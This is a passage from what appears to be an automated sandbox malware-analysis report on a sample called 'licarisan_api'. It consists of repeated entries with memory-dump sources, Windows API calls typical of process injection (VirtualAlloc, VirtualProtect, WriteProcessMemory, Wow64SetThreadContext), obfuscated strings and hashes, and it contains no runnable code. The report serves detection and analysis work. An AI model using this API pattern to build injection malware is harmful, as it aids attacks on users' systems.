                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$L$L$W$W$a$a$a$a$b$b$d$d$i$i$j@h$o$o$r$r$r$r$y$y
                                    • API String ID: 4275171209-2974322545
                                    • Opcode ID: 8f7c6e194ea65a41a98fa7e283d16fe88b08ca6f8023506353705b52753e5d3b
                                    • Instruction ID: 11652b54b1991800e11077fc1b12c6898bbd762ceb892a06ed659dd343f07e17
                                    • Opcode Fuzzy Hash: 8f7c6e194ea65a41a98fa7e283d16fe88b08ca6f8023506353705b52753e5d3b
                                    • Instruction Fuzzy Hash: 52C1A4A1D082A88FF721CA24DC047AABB79EF96310F0481FAD44D67681D6BD5FC58F52
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004361CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: 2$2$638<$E$P$c$e$e$e$i$o$p$r$s$s$t$x
                                    • API String ID: 544645111-2245852266
                                    • Opcode ID: dd7342a27765a8d856ffa6d0165c118390eaa9d2fb84b38db72164b25d60fec9
                                    • Instruction ID: cada98b8e09c1d7d84a99f5e09ea48f0cff86c0a97af0b5056d015ee8db2dd1f
                                    • Opcode Fuzzy Hash: dd7342a27765a8d856ffa6d0165c118390eaa9d2fb84b38db72164b25d60fec9
                                    • Instruction Fuzzy Hash: EF3221B1C041699FEB20CA14DC94BEA7BB9EB84314F1481FAD80D96241D63D9EC68F52

                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 007EFAAF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID: @G<C$E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 3559483778-673526664
                                    • Opcode ID: 5030c9a201b243907f74f760e8eb10b073daeece213e4f193f3e3e94c1010e9b
                                    • Instruction ID: fda412ac4c514d2e8cb9eb5865bac1542c714f1932bcdc2c052765d25ad3ec31
                                    • Opcode Fuzzy Hash: 5030c9a201b243907f74f760e8eb10b073daeece213e4f193f3e3e94c1010e9b
                                    • Instruction Fuzzy Hash: 74F1BFB1D091A98FEB24CA15CC94BEABBB5AB49304F1440FAD80DA6641C77C9FC5CF51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 638<$8A<6$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 0-3819127176
                                    • Opcode ID: aa63ba8fceb8098d81ef153ae89218ce8752a633a92396c0ce7e9adc5efe95d6
                                    • Instruction ID: 5de543b3e8721eaa209909774d6cc212c709b38aa1b7358690f77de5e1f52903
                                    • Opcode Fuzzy Hash: aa63ba8fceb8098d81ef153ae89218ce8752a633a92396c0ce7e9adc5efe95d6
                                    • Instruction Fuzzy Hash: 6DC114B2D046659EE7208A25DC84BEB7BB5EB48314F0480FAD84D97280D67C5EC5CF96

                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 007F22F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 983334009-1470631180
                                    • Opcode ID: 70a6c4b0ea5559472d3f663d70049be3326f28d021c5136c32376f09f805675e
                                    • Instruction ID: b431c33c28c5aa43ca434696a2d29acac9288408530d30969b799f04617ebee4
                                    • Opcode Fuzzy Hash: 70a6c4b0ea5559472d3f663d70049be3326f28d021c5136c32376f09f805675e
                                    • Instruction Fuzzy Hash: 4EF1DEB1D041A88BEB24CB14CC98BAABBB6EB85314F1480EAD94D66340D7785FC1CF52
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004361CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: 638<$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 544645111-387579111
                                    • Opcode ID: a2d238ec617bb7b6a70fc9ada4adc858b9b8388069ff9584b824b8d4f241cfc3
                                    • Instruction ID: 6ed5b08fcfe76b27a581f46799934f63d6ee110742751e626dd60ceb4e0175b4
                                    • Opcode Fuzzy Hash: a2d238ec617bb7b6a70fc9ada4adc858b9b8388069ff9584b824b8d4f241cfc3
                                    • Instruction Fuzzy Hash: CDE1A0B1D045688BEB24CB14CC94BEBBBB5EB88315F1480EAD84DA7341DA3C9EC58F55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: 638<$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 544645111-387579111
                                    • Opcode ID: adfd20f61809e02618b6a77d42aa679b5219ee49bc462a75b3bfcef5ce93a7cc
                                    • Instruction ID: b26a1bc0088e7b4754e30e43732aa15a9ec0b4c825e219f5b9ee833f3c41435f
                                    • Opcode Fuzzy Hash: adfd20f61809e02618b6a77d42aa679b5219ee49bc462a75b3bfcef5ce93a7cc
                                    • Instruction Fuzzy Hash: 21613BB2C48664DAF7208615DC44BEB7BB9EB45314F05C0FAD84C96281CA7D5FC58FA2
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004361CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: 638<$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 544645111-387579111
                                    • Opcode ID: 0b80dd6720e2f6e81af6c56a31711255b74131e9c13e64cc9d80159c3bcc86b4
                                    • Instruction ID: d67253d5e8140cee481a5566b8eb97b3f1a6264fef4fead56399c89abb2e45f8
                                    • Opcode Fuzzy Hash: 0b80dd6720e2f6e81af6c56a31711255b74131e9c13e64cc9d80159c3bcc86b4
                                    • Instruction Fuzzy Hash: E06128B2C045949AF7208624DC58BEB7FB8EB45314F04C0FAD84D96281DA7D9EC58FA2
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004361CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: 638<$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 544645111-387579111
                                    • Opcode ID: 7f335b916af717871f30b750282fddcbbda243f23f22e8273ef0a4aad74cc13d
                                    • Instruction ID: 49526e54870d8890fe9427392f0551500ae6889d1069737665f52b396b009230
                                    • Opcode Fuzzy Hash: 7f335b916af717871f30b750282fddcbbda243f23f22e8273ef0a4aad74cc13d
                                    • Instruction Fuzzy Hash: 03611AB1C08664DAF720CA15DC44BEB7BB5EB45314F04C0FAD84C96281DA7D5EC58FA2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: c11aba4442d28daf73e17c8326aa6d842f6710027655167d688ba819fee8047d
                                    • Instruction ID: 7a8b93e79569afa7c60bfb2ce360f7600881bcf61567603e637672bb45212c94
                                    • Opcode Fuzzy Hash: c11aba4442d28daf73e17c8326aa6d842f6710027655167d688ba819fee8047d
                                    • Instruction Fuzzy Hash: AAE1DFA2D042689AE7208B24DC44BEAB775EF96300F1481FAD44DA6681E77D5EC2CF52
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: c53254e988d3332173246dc15b57400997504fe1bdc36f9d6250ff8814295994
                                    • Instruction ID: 99e1285d9fb397d5eb7ef560e95e0141828ec80eefb178891384239857aaf270
                                    • Opcode Fuzzy Hash: c53254e988d3332173246dc15b57400997504fe1bdc36f9d6250ff8814295994
                                    • Instruction Fuzzy Hash: 94D1BEA2D042689BE7208B24DC45BEAB779EF96300F1481FAD40DA7681E67D5FC18F52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 8756ebfd6dcfd7046b0bc61c496df5ae97e5933f3534a7cfd9391b20ae29f859
                                    • Instruction ID: 62aa38c919f499d098b77f9fdb5d960e78d2f3322187198f665a189321e39829
                                    • Opcode Fuzzy Hash: 8756ebfd6dcfd7046b0bc61c496df5ae97e5933f3534a7cfd9391b20ae29f859
                                    • Instruction Fuzzy Hash: 8591C3A1D042989FF721CA24DC05BAABB79EF96310F0081FAD44DA7681D6BD5FC18F52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 7d25d273a1b16c81526eccc507b30569896d4d3dfc9b7c9df68f6911b48d60f6
                                    • Instruction ID: 3c3320c120e67dfff9d5b242f0611c4fb49e7fb127d5043a3136ebc3872a6724
                                    • Opcode Fuzzy Hash: 7d25d273a1b16c81526eccc507b30569896d4d3dfc9b7c9df68f6911b48d60f6
                                    • Instruction Fuzzy Hash: C891C4A1D042989FF721CA24DC057AA7B79EF96310F0081FAD44DAB681D7BD5BC18F52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: e8b037268298a4d5ffb60c49fea98472954899fddb75a8fbe044820a982b3e42
                                    • Instruction ID: 49aa4d250c7f3796afa10eb66a901b421a162617eadf3b2f2087d2a69d55eb0f
                                    • Opcode Fuzzy Hash: e8b037268298a4d5ffb60c49fea98472954899fddb75a8fbe044820a982b3e42
                                    • Instruction Fuzzy Hash: 1291B4A1D042989FF721CA24DC05BAA7779EF96310F0081FAD44DA7681D7BD5BC18F52
                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00437BB7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: N23I
                                    • API String ID: 621844428-2248891880
                                    • Opcode ID: 86a047b82556f0654d6f3208545a0689b5b593e009b7340f098c97802f14d56f
                                    • Instruction ID: 1f2409d8dc3e9cde91ce654f394f12b777bf77407061de83b56be02fb7fcfc23
                                    • Opcode Fuzzy Hash: 86a047b82556f0654d6f3208545a0689b5b593e009b7340f098c97802f14d56f
                                    • Instruction Fuzzy Hash: F1B1B1B1D042689FEB24CB14CC84BEAB775EB88314F1481EAD84967380DA386ED1CF11
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e13bb9705a0713c853c84611bfd16766246ed2ca572bb3cf5f2ca4072feb2abb
                                    • Instruction ID: 2a18fefa57f1885e2f503e8d5d07645eda1b3568d1e675c69a32cb65fe14a38c
                                    • Opcode Fuzzy Hash: e13bb9705a0713c853c84611bfd16766246ed2ca572bb3cf5f2ca4072feb2abb
                                    • Instruction Fuzzy Hash: 19029CB1D052698FEB24CB14CC94BEAB7B5EF85300F1481EAE94DA7241D6386EC2CF51
                                    APIs
                                    • LoadLibraryW.KERNELBASE(?), ref: 007A778F
                                    • LoadLibraryW.KERNELBASE(FFFFF55C), ref: 007A77AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 94c2ebe60241b45d1ce9fbd4bb7fbdea7d3b05eba24d2260a0f7b65b9ac5590c
                                    • Instruction ID: ea1e00276a1e3f6aa0f40c96282c5d0db8f76cadf96dfec5b6352e2887e65f2a
                                    • Opcode Fuzzy Hash: 94c2ebe60241b45d1ce9fbd4bb7fbdea7d3b05eba24d2260a0f7b65b9ac5590c
                                    • Instruction Fuzzy Hash: 06A1C2B1C096A88BEB24CB24CC447EAB775EF95300F0481E9D44DA7651EA3A5FC5CF62
                                    APIs
                                    • LoadLibraryW.KERNELBASE(?), ref: 007A778F
                                    • LoadLibraryW.KERNELBASE(FFFFF55C), ref: 007A77AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 9b3e090531d69dd186d4dee6d3b613c20a064a003945816208054c2b982677ed
                                    • Instruction ID: 2c2d57d448038374d66fdcb1d18eca8a92cad1a133577cc111e41ae296474e4b
                                    • Opcode Fuzzy Hash: 9b3e090531d69dd186d4dee6d3b613c20a064a003945816208054c2b982677ed
                                    • Instruction Fuzzy Hash: 6991A2A1D096A88BEB24CB24CC447EA7774EF91300F0481E9D44DA7642EA7E5FC5CF62
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0042EC9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: c5a0a2312dceb3439ecd7d7b18d856ed6c99bcef0e6aa0d43dfaec38c88703bb
                                    • Instruction ID: 14b498a53ca20839f7b89bbcd03554e8a9f3d6d5c484cb62ab93e711ce4bac9b
                                    • Opcode Fuzzy Hash: c5a0a2312dceb3439ecd7d7b18d856ed6c99bcef0e6aa0d43dfaec38c88703bb
                                    • Instruction Fuzzy Hash: CFE19EB1E002288FEB24CB15EC94BEAB7B5FB85304F5441EAD94AA7381D7385ED18E45
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5bd2ac955688a7fa63ac9ab3a63ad57cb371f02ddb20f86f0cdd73e49e7c16d9
                                    • Instruction ID: 370ffbe4cde878bde6934065ce708e47dd7f33f92b3ae3a6849e6b13322ce7f4
                                    • Opcode Fuzzy Hash: 5bd2ac955688a7fa63ac9ab3a63ad57cb371f02ddb20f86f0cdd73e49e7c16d9
                                    • Instruction Fuzzy Hash: C5C1AFB1E001698FEB64CF14CC95BEAB775FB85314F1481FAD90DA6A81D6389EC1CE41
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 0043025C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: 3983c9c8573d178575308bb1f2954925cbf7ffd130db24b8bdd5658839a8f601
                                    • Instruction ID: 12ae1f3055cf662f85ed8df237c81f1b345e697e72a81e690a8c9c1b8b1e48a5
                                    • Opcode Fuzzy Hash: 3983c9c8573d178575308bb1f2954925cbf7ffd130db24b8bdd5658839a8f601
                                    • Instruction Fuzzy Hash: AFC1ABB1E045688BEB24CA14DC50BEABBB5BB85301FA481FAD84DA7641D3385FC6CF45
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0042EC9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: a57243a720ab46aeb5c1621d63892e8be7493daecc2f2fd2f639f783efea6b26
                                    • Instruction ID: d0ec39d3d6fb546583dd1d1bff883c75ecbe95c27f1040671e5caf907768c4cb
                                    • Opcode Fuzzy Hash: a57243a720ab46aeb5c1621d63892e8be7493daecc2f2fd2f639f783efea6b26
                                    • Instruction Fuzzy Hash: A4C147B4E052288BEB24CF15DD90BE9B7B6EB84315F5481EAD809A7341D7386ED18F09
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0080FDEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 5deaf237bc3b3815614d68c3dac1b51e16ffab2d257c8addff1b37483f8cfe6e
                                    • Instruction ID: f1125ff632e93b121fd529bde0f29ab5739253cec941f9edebb32c25f2f78222
                                    • Opcode Fuzzy Hash: 5deaf237bc3b3815614d68c3dac1b51e16ffab2d257c8addff1b37483f8cfe6e
                                    • Instruction Fuzzy Hash: 628135B2D10528DAE7748A14EC45BFB7779FB84311F1080FAEA0EA6A81D73D4EC18E51
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0042EC9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: 619214c3e5a3058d34d35521a5284d92c864d374118d3281ab188b51134c118b
                                    • Instruction ID: e582d12f4acdadda0878b0c11b86b8c30a814041013db2b22d4af808d8c2f324
                                    • Opcode Fuzzy Hash: 619214c3e5a3058d34d35521a5284d92c864d374118d3281ab188b51134c118b
                                    • Instruction Fuzzy Hash: A77129F1E052349BFB248B16ED54BFA7B79EB90304F5481FAD90995281E33C5EC28E16
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 13a8f68aebe97f782617a511845e494522d71a4e75c60e010fd7f09a2a0da807
                                    • Instruction ID: a58ffe6f8b1d22f210c7890636013dfefc0dbd6abb55dbf0a74ed632a9852390
                                    • Opcode Fuzzy Hash: 13a8f68aebe97f782617a511845e494522d71a4e75c60e010fd7f09a2a0da807
                                    • Instruction Fuzzy Hash: A471CDB2D045299BEB248B21DC81BFBB775FB85300F1482FAD94DA6280E73C4AC18F51
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0042EC9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: ba1cc31d0c88f6aef3822014f82c047920296f7077fa3ea0d75ebe0a76e9a7d9
                                    • Instruction ID: 440fae91d327c565061e70a3e96d93802fc45ef6f237214261ed9f1b2abbfcc9
                                    • Opcode Fuzzy Hash: ba1cc31d0c88f6aef3822014f82c047920296f7077fa3ea0d75ebe0a76e9a7d9
                                    • Instruction Fuzzy Hash: 895138F2E115249BF7248B16ED54BFA7775EB90300F1481FAE90E96680E37C5EC28E15
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 98d220a4b5e1035ce006cf79f8ea403279570493bd21e1ed02f51f1394f4d810
                                    • Instruction ID: 1940eba6b73940bce2698a16db336ba32097f5e8bfb2c772a6217e7b9e5a6e1b
                                    • Opcode Fuzzy Hash: 98d220a4b5e1035ce006cf79f8ea403279570493bd21e1ed02f51f1394f4d810
                                    • Instruction Fuzzy Hash: 9151E0B2E11A189FF714CA14DC94BEA7775EBD5310F1482FAD90E96680E63C9EC08F52
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 0043025C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: 457de24abc2bd8b7b3db86834dedcf4f06d0eb2dedc7f88d5f268d39de80beaa
                                    • Instruction ID: d32315c2f187db8c00685ea05710848eef26f72ab350f25835a7500a030024d7
                                    • Opcode Fuzzy Hash: 457de24abc2bd8b7b3db86834dedcf4f06d0eb2dedc7f88d5f268d39de80beaa
                                    • Instruction Fuzzy Hash: 95614774E046288FCB24CF14DD90BAAB7B5BB88304F5492EAD84967742D7359EC5CF05
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0042EC9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: 53494c96e5c41a9ed8580b7c4256b96fbb85e3242e627180d02b1d793d09e8b5
                                    • Instruction ID: 4b383a7f64ab4de5b14ff84ca0b4aee6b1d0042ad3809ebab42d8f257d9bbb81
                                    • Opcode Fuzzy Hash: 53494c96e5c41a9ed8580b7c4256b96fbb85e3242e627180d02b1d793d09e8b5
                                    • Instruction Fuzzy Hash: D45102B1E021348BFB208B46ED50BFEB775EB90315F5480FAD809A6681E33C5EC18E56
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0042EC9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: ed53983577d839336978f1c4c7c9ffa7f5f9c4774ac7ffa7696d59e9c267a36b
                                    • Instruction ID: d236c70cddcf24224fc922163b3e4d87239442ee075ec223541648e8caf7581d
                                    • Opcode Fuzzy Hash: ed53983577d839336978f1c4c7c9ffa7f5f9c4774ac7ffa7696d59e9c267a36b
                                    • Instruction Fuzzy Hash: 6C51C2B1E015348BFB208B56ED50BFAB775EB90315F5481FAD809A6680E37D5EC28E06
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0042EC9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: 59b96a7e03e3e154233bd28a83264b2fcd50b070ed18dbb281069cc5cca4998d
                                    • Instruction ID: 9d22583756bd24dedb6dba5f55f4be0aa5ed676206682e24c0b653548d0947b7
                                    • Opcode Fuzzy Hash: 59b96a7e03e3e154233bd28a83264b2fcd50b070ed18dbb281069cc5cca4998d
                                    • Instruction Fuzzy Hash: F24124B2E015349BFB108B56ED50BFAB775EB90305F5480F6D80996681E33C5EC28E16
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 0043025C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
